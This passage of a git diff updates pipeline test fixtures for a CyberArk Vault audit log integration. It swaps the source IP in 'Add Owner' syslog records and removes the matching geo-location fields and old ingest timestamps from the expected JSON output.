Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json index 0c06f3da561..ff8d5d395f0 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -41,7 +29,7 @@ "Master" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -50,7 +38,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Master", "message": "Add Owner", @@ -64,8 +52,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021023200Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Master\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101419Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Master\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -92,20 +80,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -125,7 +101,7 @@ "Administrator" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -134,7 +110,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Administrator", "message": "Add Owner", @@ -148,8 +124,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021035500Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101427Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -176,20 +152,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -210,7 +174,7 @@ "Batch" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -219,7 +183,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Batch", "message": "Add Owner", @@ -233,8 +197,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021038900Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Batch\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101432600Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Batch\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -261,20 +225,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -295,7 +247,7 @@ "Operators" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -304,7 +256,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Operators", "message": "Add Owner", @@ -318,8 +270,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021041600Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Operators\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101437900Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Operators\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -346,20 +298,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -380,7 +320,7 @@ "Backup Users" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -389,7 +329,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Backup Users", "message": "Add Owner", @@ -403,8 +343,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021044200Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Backup Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101443300Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Backup Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -431,20 +371,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -465,7 +393,7 @@ "Auditors" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -474,7 +402,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Auditors", "message": "Add Owner", @@ -488,8 +416,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021046400Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101448700Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -516,20 +444,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -550,7 +466,7 @@ "DR Users" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -559,7 +475,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "DR Users", "message": "Add Owner", @@ -573,8 +489,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021048500Z", - "original": 